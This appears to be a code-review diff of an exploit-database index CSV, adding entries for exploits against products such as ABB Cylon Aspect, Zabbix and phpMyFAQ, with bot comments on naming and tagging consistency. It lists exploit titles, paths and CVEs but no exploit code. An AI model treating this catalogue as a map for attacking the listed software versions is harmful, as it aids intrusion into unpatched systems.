45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
45606,exploits/hardware/webapps/45606.txt,"FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,

@ -10404,6 +10408,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52215,exploits/multiple/hardware/52215.txt,"ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,,
52216,exploits/multiple/hardware/52216.txt,"ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48839,,,,,
52224,exploits/multiple/hardware/52224.txt,"ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51546,,,,,
52231,exploits/multiple/hardware/52231.html,"ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)",2025-04-16,LiquidWorm,hardware,multiple,,2025-04-16,2025-04-16,0,CVE-2024-48846,,,,,
52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52220,exploits/multiple/hardware/52220.txt,"ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,,,,,,
52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,

@ -11919,6 +11924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,,
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,,2020-04-24,2020-04-24,0,,,,,,
38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple,,2012-11-09,2017-11-09,1,CVE-2012-4949;OSVDB-87277,,,,,https://www.securityfocus.com/bid/56474/info
52241,exploits/multiple/webapps/52241.txt,"Ethercreative Logs 3.0.3 - Path Traversal",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-23409,,,,,
10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple,,2009-10-13,,1,CVE-2009-3828;OSVDB-59139,,2009-11-22-EverFocus_Edsr_Exploit.tar.gz,,,
52126,exploits/multiple/webapps/52126.py,"Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)",2025-04-05,"Al Baradi Joy",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-1234,,,,,
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,

@ -11959,6 +11965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,,
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
52238,exploits/multiple/webapps/52238.txt,"Garage Management System 1.0 (categoriesName) - Stored XSS",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-41358,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,

@ -12156,7 +12163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-16,0,CVE-2025-29471,,,,,
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
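Review bot: This hunk is a one-line modification (`-12156,7 +12163,7`), but the rendering shows both the old and the new row 52117 without `-`/`+` markers, so it reads as though the CSV now carries two rows with the same id; confirm the committed file keeps only the updated row (date_updated 2025-04-16, CVE-2025-29471) and that no duplicate id is introduced.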

@ -12280,6 +12287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,,2018-12-11,2018-12-11,0,,,,,,
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,,2018-03-12,2018-03-12,0,,,,,,
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
52236,exploits/multiple/webapps/52236.txt,"ProConf 6.0 - Insecure Direct Object Reference (IDOR)",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2018-16606,,,,,
9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
52103,exploits/multiple/webapps/52103.py,"Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass",2025-03-28,VeryLazyTech,webapps,multiple,,2025-03-28,2025-04-13,0,CVE-2024-4358,,,,,
35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,

@ -12397,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,,2019-08-27,2019-08-27,1,CVE-2019-15637,,,,,
49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
52228,exploits/multiple/webapps/52228.txt,"Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)",2025-04-16,"Ayato Shitomi @ Fore-Z co.ltd",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-46278,,,,,
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,,2020-12-01,2020-12-01,0,,,,,,
49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
49077,exploits/multiple/webapps/49077.txt,"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution",2020-11-19,"Darren King",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,

@ -12463,6 +12472,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6
47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,,2019-09-02,2020-06-18,0,,,,,,
51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,,
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
|
||||
|
@ -13045,6 +13055,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
|
||||
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
|
||||
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
|
||||
52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
52232,exploits/php/hardware/52232.txt,"ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe,
|
||||
28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info
21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info
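Review bot: The three ABB Cylon Aspect rows added here (52234, 52233, 52232) leave the vulnerability-tag column empty although the index uses that column for exactly these classes; 52234 is a DoS and 52232 an RCE, so tagging them the way 44336 is tagged (`"Denial of Service (DoS)"`) keeps the new rows filterable alongside the existing ones. While in this region, note that the neighbouring 52218 writes "(DOS)" in its description where the rest of the file uses "(DoS)"; if that row is touched again, align the spelling.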
@ -15597,6 +15610,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
52243,exploits/php/webapps/52243.py,"Car Rental Project 1.0 - Remote Code Execution",2025-04-16,ub3rsick,webapps,php,,2025-04-16,2025-04-16,0,CVE-2020-5509,,,,,
49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
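Review bot: 52243 ("Car Rental Project 1.0 - Remote Code Execution") does not say whether the RCE needs credentials, while the adjacent Car Rental rows state it explicitly ("Remote Code Execution (Authenticated)" on 49055). Add the "(Authenticated)" qualifier, or an explicit unauthenticated marker, so the new row follows the index convention and searches on that qualifier find it; the tag column is also empty and could carry the class.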
@ -22533,6 +22547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
52245,exploits/php/webapps/52245.txt,"KodExplorer 4.52 - Open Redirect",2025-04-16,"Rahad Chowdhury",webapps,php,,2025-04-16,2025-04-16,0,,,,,,
51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
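Review bot: 52245 ("KodExplorer 4.52 - Open Redirect") lands between "KodExplorer 4.49" and "KodExplorer v4.51.03", which is the right string sort only because 51419 carries a stray "v" prefix; to a reader the versions now appear out of order (4.49, 4.52, v4.51.03). Since this hunk is being edited anyway, consider dropping the "v" on 51419 so the three KodExplorer rows sort by version as well as by string.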
@ -24531,6 +24546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php,,2021-01-14,2021-01-18,0,CVE-2020-35578,,,,,
3919,exploits/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,2016-10-05,1,OSVDB-36054;CVE-2007-2710;CVE-2007-2709,,,,http://www.exploit-db.comnagiosql-2.00-P00.tar.gz,
24415,exploits/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,webapps,php,,2004-08-28,2013-01-27,1,CVE-2004-1640;OSVDB-9394,,,,,https://www.securityfocus.com/bid/11064/info
52229,exploits/php/webapps/52229.py,"NagVis 1.9.33 - Arbitrary File Read",2025-04-16,xerosec,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-46945,,,,,
37270,exploits/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,php,80,2015-06-12,2015-06-12,0,OSVDB-123303;OSVDB-123302;OSVDB-123301;OSVDB-123300;OSVDB-123299;OSVDB-123298;OSVDB-123297,,,,http://www.exploit-db.comkilrizzy-Nakid-CMS-f274624.tar.gz,
13893,exploits/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,webapps,php,,2010-06-15,2010-08-31,0,,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
13889,exploits/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,webapps,php,,2010-06-15,,0,CVE-2010-2358;OSVDB-65543,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
@ -27624,6 +27640,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42761,exploits/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)",2017-09-21,"Ishaq Mohammed",webapps,php,,2017-09-21,2017-11-17,0,CVE-2017-14618,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
52226,exploits/php/webapps/52226.txt,"phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)",2025-04-16,CodeSecLab,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-4407,,,,,
52235,exploits/php/webapps/52235.txt,"phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames",2025-04-16,Geo,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-55889,,,,,
33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info
51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info
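Review bot: The two new phpMyFAQ rows name the weakness inconsistently with each other and with their neighbours: 52226 appends "(XSS)" to "Reflected Cross-Site Scripting" while 42761, 42987 and 43063 write "Cross-Site Scripting" with no abbreviation, and 52235's "Unintended File Download Triggered by Embedded Frames" describes a symptom rather than a vulnerability class. Suggest "phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting" for 52226 and a class-bearing description for 52235, with the class repeated in the otherwise empty tag column so both rows can be filtered.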
@ -30129,6 +30147,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php,,2016-12-12,2016-12-12,0,,,,,,
49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,,2020-12-18,2020-12-18,0,,,,,,
34689,exploits/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,webapps,php,,2009-08-27,2014-09-18,1,,,,,,https://www.securityfocus.com/bid/43376/info
52247,exploits/php/webapps/52247.txt,"Smart Manager 8.27.0 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-0566,,,,,
36386,exploits/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",webapps,php,,2015-03-16,2015-03-16,1,OSVDB-119631,,,,http://www.exploit-db.comsmart_php_poll.zip,
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
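Review bot: 52247 uses "Post-Authenticated SQL Injection" in its description, a phrasing the index does not use anywhere else; the established form is a trailing "(Authenticated)" qualifier, as in "Remote Code Execution (Authenticated)" on other rows. Rename to "Smart Manager 8.27.0 - SQL Injection (Authenticated)" so that searches on the qualifier match this row too.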
@ -34884,6 +34903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,,2019-10-08,2019-10-10,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",2022-03-10,"Hussien Misbah",webapps,php,,2022-03-10,2022-03-10,0,,,,,,
52230,exploits/php/webapps/52230.py,"Zabbix 7.0.0 - SQL Injection",2025-04-16,m4nb4,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-42327,,,,,
33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php,,2009-10-14,2014-05-10,1,CVE-2009-4523;OSVDB-61466,,,,,https://www.securityfocus.com/bid/36701/info
26604,exploits/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3884;OSVDB-21197,,,,,https://www.securityfocus.com/bid/15579/info
24235,exploits/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,webapps,php,,2004-06-24,2013-01-20,1,CVE-2004-0621;OSVDB-16040,,,,,https://www.securityfocus.com/bid/10605/info
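Review bot: 52230 ("Zabbix 7.0.0 - SQL Injection") carries no authentication qualifier although the other Zabbix rows in this hunk are explicit about it (50816 "(Authenticated)", 47474 "Authentication Bypass"); state whether the injection is reachable without credentials, since that is the first thing a reader filtering the index by impact needs. The tag column is empty as well and could carry the class.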
@ -35098,6 +35118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375,2017-09-11,2017-09-11,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/c91ef1f09274d7f0efaf89c3740ceca316cca0b3/modules/exploits/linux/http/docker_daemon_tcp.rb
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",2022-01-05,"Jeremiasz Pluta",remote,python,,2022-01-05,2022-01-05,0,CVE-2021-43857,,,,,
42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python,,2017-08-31,2017-09-01,1,CVE-2017-1000117,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/202c936868328a4fe665c9d2ea82b8f8a2610b6e/modules/exploits/multi/http/git_submodule_command_exec.rb
52227,exploits/python/remote/52227.txt,"Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)",2025-04-16,"The Kernel Panic",remote,python,,2025-04-16,2025-04-16,0,CVE-2024-11392,,,,,https://drive.google.com/file/d/14bnNaCRmFOQvPHUR9zQwdbjMmzKE2pZl/view?usp=drive_link
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
